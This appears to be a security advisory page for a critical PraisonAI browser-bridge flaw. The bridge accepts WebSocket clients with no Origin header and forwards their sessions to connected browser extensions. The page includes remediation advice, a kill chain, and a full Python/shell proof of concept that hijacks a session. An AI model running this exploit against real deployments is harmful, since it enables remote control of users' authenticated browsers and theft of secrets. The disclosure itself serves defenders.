GHSA-8x8f-54wf-vv92 — CRITICAL (CVSS 9.1) AI Security Vulnerability

CISO Take

PraisonAI's browser bridge binds to 0.0.0.0 by default and accepts WebSocket connections that omit the Origin header entirely, allowing any unauthenticated network attacker to hijack active browser automation sessions without credentials. With a CVSS 9.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N) and no authentication required, this is trivially exploitable by any host that can reach the bridge port — including other machines on the same LAN or cloud VPC. Organizations running agentic AI workflows with browser automation face unauthorized browser actions, exfiltration of authenticated web session content, and full misuse of model-backed automation pipelines against internal tooling. Patch immediately to praisonai >= 4.5.139 / praisonaiagents >= 1.5.140; if patching is not immediately feasible, explicitly bind the bridge to 127.0.0.1 and block the port at the host firewall.

Sources: GitHub Advisory ATLAS

Risk Assessment

Critical risk. CVSS 9.1 with network attack vector, low complexity, no privileges required, and no user interaction makes this trivially exploitable in any environment where the browser bridge port is reachable beyond localhost. The default binding to 0.0.0.0 means misconfigured developer workstations, cloud VMs, and CI/CD runners are directly exposed. The complete absence of authentication on the WebSocket session-control path is a fundamental design flaw — not a misconfiguration — and the published PoC dramatically lowers the bar for exploitation. The 41 prior CVEs in the same package indicate an ongoing pattern of security debt in this project.

Attack Kill Chain

Network Discovery

Attacker scans network and identifies PraisonAI browser bridge bound to 0.0.0.0 on the default port, confirming the /ws WebSocket endpoint is reachable.

AML.T0006

Authentication Bypass

Attacker connects to /ws without an Origin header, bypassing the conditional origin check entirely and receiving a confirmed 'connected' status from the server.

AML.T0049

Session Hijack via Agent Invocation

Attacker sends start_session with a malicious goal; server forwards start_automation to the first available idle browser extension connection without any pairing or authorization check.

AML.T0053

Data Exfiltration

Connected browser extension executes the automation against authenticated internal resources and all action results and page content are broadcast back to the attacker's unauthenticated WebSocket.

AML.T0086

Network Discovery

Attacker scans network and identifies PraisonAI browser bridge bound to 0.0.0.0 on the default port, confirming the /ws WebSocket endpoint is reachable.

AML.T0006

Authentication Bypass

Attacker connects to /ws without an Origin header, bypassing the conditional origin check entirely and receiving a confirmed 'connected' status from the server.

AML.T0049

Session Hijack via Agent Invocation

Attacker sends start_session with a malicious goal; server forwards start_automation to the first available idle browser extension connection without any pairing or authorization check.

AML.T0053

Data Exfiltration

Connected browser extension executes the automation against authenticated internal resources and all action results and page content are broadcast back to the attacker's unauthenticated WebSocket.

AML.T0086

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
PraisonAI	pip	<= 4.5.138	`4.5.139`
praisonaiagents	pip	<= 1.5.139	`1.5.140`

Severity & Risk

CVSS 3.1

9.1 / 10

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Trivial

Attack Surface

AV Network

AC Low

PR None

UI None

S Unchanged

C High

I High

A None

Recommended Action

Patch immediately: upgrade praisonai to >= 4.5.139 and praisonaiagents to >= 1.5.140.
If immediate patching is infeasible, restart the bridge with an explicit loopback bind flag and block the bridge port at the host firewall for all external interfaces.
Audit exposure: run 'ss -tlnp' or 'netstat -an' to verify no bridge ports are bound to 0.0.0.0 or public interfaces.
Implement network segmentation for hosts running AI browser automation — these hosts should not be reachable from untrusted network segments.
Monitor WebSocket connections to the bridge port for non-browser clients: connections lacking a valid 'chrome-extension://' Origin header should be treated as anomalous.

Classification

Auth Bypass Data Extraction Code Execution Agent Plugin AML.T0049 - Exploit Public-Facing Application AML.T0053 - AI Agent Tool Invocation AML.T0086 - Exfiltration via AI Agent Tool Invocation AML.T0108 - AI Agent AML.T0112.000 - Local AI Agent

Compliance Impact

This CVE is relevant to:

EU AI Act

Art. 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.6.1.4 - AI system security — access control

NIST AI RMF

MANAGE-2.2 - Mechanisms to sustain the value of deployed AI systems are evaluated and applied

OWASP LLM Top 10

LLM06:2025 - Excessive Agency

Frequently Asked Questions

What is GHSA-8x8f-54wf-vv92?

PraisonAI's browser bridge binds to 0.0.0.0 by default and accepts WebSocket connections that omit the Origin header entirely, allowing any unauthenticated network attacker to hijack active browser automation sessions without credentials. With a CVSS 9.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N) and no authentication required, this is trivially exploitable by any host that can reach the bridge port — including other machines on the same LAN or cloud VPC. Organizations running agentic AI workflows with browser automation face unauthorized browser actions, exfiltration of authenticated web session content, and full misuse of model-backed automation pipelines against internal tooling. Patch immediately to praisonai >= 4.5.139 / praisonaiagents >= 1.5.140; if patching is not immediately feasible, explicitly bind the bridge to 127.0.0.1 and block the port at the host firewall.

Is GHSA-8x8f-54wf-vv92 actively exploited?

No confirmed active exploitation of GHSA-8x8f-54wf-vv92 has been reported, but organizations should still patch proactively.

How to fix GHSA-8x8f-54wf-vv92?

1. Patch immediately: upgrade praisonai to >= 4.5.139 and praisonaiagents to >= 1.5.140. 2. If immediate patching is infeasible, restart the bridge with an explicit loopback bind flag and block the bridge port at the host firewall for all external interfaces. 3. Audit exposure: run 'ss -tlnp' or 'netstat -an' to verify no bridge ports are bound to 0.0.0.0 or public interfaces. 4. Implement network segmentation for hosts running AI browser automation — these hosts should not be reachable from untrusted network segments. 5. Monitor WebSocket connections to the bridge port for non-browser clients: connections lacking a valid 'chrome-extension://' Origin header should be treated as anomalous.

What systems are affected by GHSA-8x8f-54wf-vv92?

This vulnerability affects the following AI/ML architecture patterns: AI agent frameworks, Browser automation pipelines, Agentic AI workflows, AI-assisted developer tooling.

What is the CVSS score for GHSA-8x8f-54wf-vv92?

GHSA-8x8f-54wf-vv92 has a CVSS v3.1 base score of 9.1 (CRITICAL).

Technical Details

NVD Description

### Summary `praisonai browser start` exposes the browser bridge on `0.0.0.0` by default, and its `/ws` endpoint accepts websocket clients that omit the `Origin` header entirely. An unauthenticated network client can connect as a fake controller, send `start_session`, cause the server to forward `start_automation` to another connected browser-extension websocket, and receive the resulting action/status stream back over that hijacked session. This allows unauthorized remote use of a connected browser automation session without any credentials. ### Details The issue is in the browser bridge trust model. The code assumes that websocket peers are trusted local components, but that assumption is not enforced. Relevant code paths: - Default network exposure: `src/praisonai/praisonai/browser/server.py:38-44` and `src/praisonai/praisonai/browser/cli.py:25-30` - Optional-only origin validation: `src/praisonai/praisonai/browser/server.py:156-173` - Unauthenticated `start_session` routing: `src/praisonai/praisonai/browser/server.py:237-240` and `src/praisonai/praisonai/browser/server.py:289-302` - Cross-connection forwarding to any other idle websocket: `src/praisonai/praisonai/browser/server.py:344-356` - Broadcast of action output back to the initiating unauthenticated client: `src/praisonai/praisonai/browser/server.py:412-423` and `src/praisonai/praisonai/browser/server.py:462-476` The handshake logic only checks origin when an `Origin` header is present: ```python origin = websocket.headers.get("origin") if origin: ... if not is_allowed: await websocket.close(code=1008) return await websocket.accept() ``` This means a non-browser client can omit `Origin` completely and still be accepted. After that, any connected client can send `{"type":"start_session", ...}`. The server then looks for the first other websocket without a session and sends it a `start_automation` message: ```python if client_conn != conn and client_conn.websocket and not client_conn.session_id: await client_conn.websocket.send_text(json_mod.dumps(start_msg)) client_conn.session_id = session_id sent_to_extension = True break ``` When the extension-side connection responds with an observation, the resulting action is broadcast to every websocket with the same `session_id`, including the unauthenticated initiating client: ```python action_response = { "type": "action", "session_id": session_id, **action, } for client_id, client_conn in self._connections.items(): if client_conn.session_id == session_id and client_conn != conn: await client_conn.websocket.send_json(action_response) ``` I verified this on the latest local checkout: `praisonai` version `4.5.134` at commit `365f75040f4e279736160f4b6bdb2bdb7a3968d4`. ### PoC I used `tmp/pocs/poc.sh` to reproduce the issue from a clean local checkout. Run: ```bash cd "/Users/r1zzg0d/Documents/CVE hunting/targets/PraisonAI" ./tmp/pocs/poc.sh ``` Expected vulnerable output: ```text [+] No-Origin client accepted: True [+] Session forwarded to extension: True [+] Action broadcast to attacker: True [+] RESULT: VULNERABLE - unauthenticated client can hijack browser sessions. ``` Step-by-step reproduction: 1. Start the local browser bridge from the checked-out source tree. 2. Connect one websocket as a stand-in extension using a valid `chrome-extension://<32-char-id>` origin. 3. Connect a second websocket with no `Origin` header. 4. Send `start_session` from the unauthenticated websocket. 5. Observe that the server forwards `start_automation` to the extension websocket. 6. Send an `observation` from the extension websocket using the assigned `session_id`. 7. Observe that the resulting `action` and completion `status` are delivered back to the unauthenticated initiating websocket. `tmp/pocs/poc.sh`: ```sh #!/bin/sh set -eu SCRIPT_DIR="$(CDPATH= cd -- "$(dirname -- "$0")" && pwd)" cd "$SCRIPT_DIR/../.." exec uv run --no-project \ --with fastapi \ --with uvicorn \ --with websockets \ python3 "$SCRIPT_DIR/poc.py" ``` `tmp/pocs/poc.py`: ```python #!/usr/bin/env python3 """Verify unauthenticated browser-server session hijack on current source tree. This PoC starts the BrowserServer from the local checkout, connects: 1. A fake extension client using an arbitrary chrome-extension Origin 2. An attacker client with no Origin header It then shows the attacker can start a session that the server forwards to the extension connection, and can receive the resulting action broadcast back over that hijacked session. """ from __future__ import annotations import asyncio import json import os import socket import sys import tempfile from pathlib import Path REPO_ROOT = Path(__file__).resolve().parents[2] SRC_ROOT = REPO_ROOT / "src" / "praisonai" if str(SRC_ROOT) not in sys.path: sys.path.insert(0, str(SRC_ROOT)) def _pick_port() -> int: with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: sock.bind(("127.0.0.1", 0)) return sock.getsockname()[1] class DummyBrowserAgent: """Minimal stub to avoid real LLM/browser dependencies during validation.""" def __init__(self, model: str, max_steps: int, verbose: bool): self.model = model self.max_steps = max_steps self.verbose = verbose async def aprocess_observation(self, message: dict) -> dict: return { "action": "done", "thought": f"processed: {message.get('url', '')}", "done": True, "summary": "dummy action generated", } async def main() -> int: temp_home = tempfile.TemporaryDirectory(prefix="praisonai-browser-poc-") os.environ["HOME"] = temp_home.name from praisonai.browser.server import BrowserServer import praisonai.browser.agent as agent_module import uvicorn import websockets agent_module.BrowserAgent = DummyBrowserAgent port = _pick_port() server = BrowserServer(host="127.0.0.1", port=port, verbose=False) app = server._get_app() config = uvicorn.Config( app, host="127.0.0.1", port=port, log_level="error", access_log=False, ) uvicorn_server = uvicorn.Server(config) server_task = asyncio.create_task(uvicorn_server.serve()) try: for _ in range(50): if uvicorn_server.started: break await asyncio.sleep(0.1) else: raise RuntimeError("Uvicorn server did not start in time") ws_url = f"ws://127.0.0.1:{port}/ws" async with websockets.connect( ws_url, origin="chrome-extension://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", ) as extension_ws: extension_welcome = json.loads(await extension_ws.recv()) print("[+] Extension welcome:", extension_welcome) async with websockets.connect(ws_url) as attacker_ws: attacker_welcome = json.loads(await attacker_ws.recv()) print("[+] Attacker welcome:", attacker_welcome) await attacker_ws.send( json.dumps( { "type": "start_session", "goal": "Open internal admin page and reveal secrets", "model": "dummy", "max_steps": 1, } ) ) start_response = json.loads(await attacker_ws.recv()) print("[+] Attacker start_session response:", start_response) hijacked_msg = json.loads(await extension_ws.recv()) print("[+] Extension received forwarded message:", hijacked_msg) session_id = hijacked_msg["session_id"] await extension_ws.send( json.dumps( { "type": "observation", "session_id": session_id, "step_number": 1, "url": "https://victim.example/internal", "elements": [{"selector": "#secret"}], } ) ) attacker_action = json.loads(await attacker_ws.recv()) attacker_status = json.loads(await attacker_ws.recv()) print("[+] Attacker received broadcast action:", attacker_action) print("[+] Attacker received completion status:", attacker_status) no_origin_client_connected = attacker_welcome.get("status") == "connected" forwarded_to_extension = hijacked_msg.get("type") == "start_automation" action_broadcasted = ( attacker_action.get("type") == "action" and attacker_action.get("session_id") == session_id ) print("[+] No-Origin client accepted:", no_origin_client_connected) print("[+] Session forwarded to extension:", forwarded_to_extension) print("[+] Action broadcast to attacker:", action_broadcasted) if no_origin_client_connected and forwarded_to_extension and action_broadcasted: print("[+] RESULT: VULNERABLE - unauthenticated client can hijack browser sessions.") return 0 print("[-] RESULT: NOT VULNERABLE") return 1 finally: uvicorn_server.should_exit = True try: await asyncio.wait_for(server_task, timeout=5) except Exception: server_task.cancel() temp_home.cleanup() if __name__ == "__main__": raise SystemExit(asyncio.run(main())) ``` `tmp/pocs/poc.py` starts a temporary local server, stubs the browser agent, opens both websocket roles, and prints the final vulnerability conditions explicitly. PoC Video: https://github.com/user-attachments/assets/df078542-bbdc-4341-b438-89c86365009e ### Impact This is an unauthenticated remote-control vulnerability in the browser automation bridge. Any network client that can reach the exposed bridge can impersonate the controller side of the workflow, hijack an available connected extension session, and receive automation output from that hijacked session. In real deployments, this can allow unauthorized browser actions, misuse of model-backed automation, and leakage of sensitive page context or automation results. Who is impacted: - Operators who run `praisonai browser start` with the default host binding - Users with an active connected browser extension session - Environments where the bridge is reachable from other hosts on the network ### Recommended Fix Suggested remediations: 1. Require explicit authentication for every websocket client connecting to `/ws`. 2. Reject websocket handshakes that omit `Origin`, unless they are using a separate authenticated localhost-only transport. 3. Bind the browser bridge to `127.0.0.1` by default and require explicit operator opt-in for non-loopback exposure. 4. Do not route `start_session` to “the first other idle connection”; instead, pair authenticated controller and extension clients explicitly.

Exploitation Scenario

An attacker on the same network segment as a developer running 'praisonai browser start' scans for the default bridge port. They open a WebSocket connection to /ws without including an Origin header, bypassing the conditional check entirely and receiving a 'connected' welcome message. They send {"type": "start_session", "goal": "Navigate to internal Vault UI and extract secret values", "model": "gpt-4o", "max_steps": 10}. The bridge immediately forwards a start_automation message to the developer's connected Chrome extension — already authenticated in the developer's browser to internal tooling. The extension executes the goal against the internal Vault UI. The attacker's WebSocket receives each action response and the final status stream containing extracted secrets, never having authenticated or interacted with any user.